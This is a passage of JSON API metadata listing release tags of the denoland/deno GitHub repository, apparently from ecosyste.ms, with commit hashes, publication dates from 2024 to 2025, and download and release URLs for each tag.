osyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","s